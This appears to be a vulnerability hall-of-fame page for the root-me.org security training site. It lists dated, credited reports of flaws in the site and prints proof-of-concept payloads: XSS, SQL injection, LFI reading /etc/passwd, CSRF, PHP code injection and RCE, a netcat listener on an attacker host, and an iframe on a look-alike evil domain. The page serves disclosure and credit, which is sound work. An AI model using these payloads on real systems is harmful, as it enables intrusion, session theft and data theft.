Hacks

As on any information system, some weaknesses were identified on the website.

02/12/2009 real

found a code injection vulnerability :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'

02/02/2011 hello

found several stored XSS in the PM system :

<script>[code javascript/vbscript]</script>

15/02/2011 EsSandre

found a LFI :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

30/06/2011 elyfean

found a CSRF on the chatbox :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

11/07/2011 Armel

found a stored XSS on the chatbox.

<iframe src="javascript:[code javascript]' />

18/07/2011 g0uZ

found a PHP code injection vulnerability on the "online tools : nmap"

Host to scan in -sV mode :

--version-trace -p8888 [IP server attacker]

Service listening on attacker server

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

02/10/2011 Hypnoze

found a insecure indirect object references which lead to unauthorized access to all PM :

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]

23/10/2011 courte66

found a reflected XSS in the "encode - decode" page :

Text to decode in base64

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

20/03/2012 jimee

found a LFI in a challenge :

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

06/11/2012 jimee

found several stored XSS in the user profile management :

<script>[code javascript/vbscript]</script>

15/05/2020 Laluka

identified multiples vulnerabilities : 3 reflected XSS, 2 SQLi and 1 RCE :

https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

01/10/2021 Podalirius

identified a vulnerability allowing access to documents attached to solutions without restrictions :

<imgXX>

17/03/2022 Mizu

identified a stored XSS vulnerability exploitable with an iframe hosted on a malicious domain starting with www.root-me.org :

<iframe src="https://www.root-me.org.evil.domain/">